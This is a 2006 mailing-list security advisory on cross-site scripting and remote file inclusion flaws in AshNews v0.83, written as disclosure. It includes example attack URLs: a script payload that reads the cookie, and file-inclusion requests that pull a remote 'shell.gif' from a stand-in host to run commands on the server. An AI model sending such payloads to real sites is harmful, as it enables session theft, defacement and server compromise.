Full Disclosure mailing list archives
AshWebStudio AshNews Multiple Vulnerabilities
From: zeus olimpusklan <zeus.olimpusklan () gmail com>
Date: Wed, 1 Feb 2006 13:00:46 -0600
########################################################################### # Advisory #7 Title: AshWebStudio AshNews Multiple Vulnerabilities # # # Author: 0o_zeus_o0 # Contact: zeus () diosdelared com # Website: Security-mx.org # Date: 01/02/2006 # Risk: High # Vendor Url: http://dev.ashwebstudio.com/?section=ashnews # Affected Software: AshWebStudio AshNews # Non Affected: # # We Are: olimpus klan team # #Info: #================================================================ #the vulneravilidad of cross site scripting allows to a kidnapping of #identity by means of the robbery of the cookie, #this bug is in file ashnews.php. #now also are two bugs of high gravity which allow remote #cases out inclusion and the execution of commands #commands in the servant, #it is considered burdens so that deformation of the site or robbery #of confidential information can cause these errors #they are in the archives, #ashnews.php and ashheadlines.php # #Example cross site scripting: #================================================================ # #http://example.com/[ashdirpath]/ashnews.php?page=showcomments&id=<script>alert( document.cookie);</script> # #Example Remote File Inclusion: #================================================================ #http://example.com/[ashdirpath]/ashheadlines.php?pathtoashnews= http://www.example.com/shell.gif? # #http://www.example.com/[ashdirpath]/ashnews.php?pathtoashnews= http://www.example.com/shell.gif? # #Solution: #================================================================ # #reported the vendor or in security-mx.org # # #VULNERABLE VERSIONS #================================================================ #ashnews v0.83 Other versions may also be affected. # # #================================================================ #Contact information #0o_zeus_o0 #zeus () diosdelared com #www.Security-mx.org #================================================================ #greetz: lady fire,Mi beba, olimpus klan team and all security-mx ##############################################################################
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- AshWebStudio AshNews Multiple Vulnerabilities zeus olimpusklan (Feb 01)